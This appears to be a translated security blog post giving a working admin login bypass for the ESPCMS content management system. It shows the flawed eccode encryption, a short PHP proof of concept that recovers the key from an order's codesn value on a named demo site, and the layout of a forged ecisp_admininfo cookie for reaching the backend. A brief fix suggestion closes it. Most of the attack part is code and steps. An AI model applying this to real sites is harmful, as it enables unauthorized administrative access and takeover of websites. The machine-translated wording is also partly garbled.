ESPCMS latest background login bypass DEMO Test

ESPCMS latest background login bypass DEMO Test

It is also a encryption and decryption function, but it is different from the previous one.

Look at the encryption and decryption functions
 

function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {$result = null;if ($operation == 'ENCODE') {if (extension_loaded('mcrypt') && $mcrype) {$result = $this->encryptCookie($string, $key);} else {for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) + ord($keychar));$result.=$char;}$result = base64_encode($result);$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);}} elseif ($operation == 'DECODE') {if (extension_loaded('mcrypt') && $mcrype) {$result = $this->decryptCookie($string, $key);} else {$data = str_replace(array('-', '_'), array('+', '/'), $string);$mod4 = strlen($data) % 4;if ($mod4) {$data .= substr('====', $mod4);}$string = base64_decode($data);for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) - ord($keychar));$result.=$char;}}}return $result;}

One more sentence than before
 

if (extension_loaded('mcrypt') && $mcrype) {$result = $this->encryptCookie($string, $key);

If the mcrypt module exists and $ mcrype is true, encryptCookie is called for encryption,

EncryptCookie
 

function encryptCookie($value, $key = '@LFK24s224%@safS3s%1f%') {if (!$value) {return false;}$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, md5($key), $value, MCRYPT_MODE_ECB, $iv);return trim(base64_encode($crypttext));}

Php built-in encryption function .. Kneel down.

When encrypting cookie operations such as members and backend users, mcrype is set to true by default. As a result, the previous method does not work.

However, in the/interface/ordermain. php file, the mcrype is set to false when encryption is found.
 

function in_read() {............$payobj = new $plugcode();$codesn = $this->fun->eccode($plugcode . $read['ordersn'] . $oid, 'ENCODE', db_pscode, FALSE);$respondArray = array('code' => $plugcode, 'ordersn' => $read['ordersn'], 'oid' => $oid, 'codesn' => $codesn);$return_url = $this->get_link('paybackurl', $respondArray, admin_LNG, 0, 1);..........

We can use the previous method to restore the key of this codesn.

The code for checking administrator permissions in the background is as follows:
 

if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)

Encrypt with the obtained key

1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)

This value can be used to log on to the background. (Random password. Do not write an error in admin_AGENT and admin_ClassURL. )

Bytes -----------------------------------------------------------------------------------

First, register a user, purchase a product, and go to the order view page,

Review elements,

 

return_url=http://demo.ecisp.cn/html/cn/index.php?ac=respond&at=payok&codesn=ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw&code=alipay&ordersn=ESP-201502240614511702&oid=198

Return_url is what we need.

Enter poc,
 

$ Text = "plaintext"; // The value of code, ordersn, and oid in the obtained string. $ cookie = "ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw "; // cookie $ bincookie = base64_decode ($ cookie); for ($ j = 0; $ j <strlen ($ text); $ j ++) {echo chr (ord ($ bincookie [$ j])-ord ($ text [$ j]);}

Then
 

5b16dd028ac5b2eabab6125A6A88B****

Encryption with encryptCookie,
 

Modify cookie ecisp_admininfo,

You can log on to the background.
 

 

Solution:

Do not understand why FALSE is required .. It is best to check the password for Logon detection. Do not trust the data transmitted by the user too much.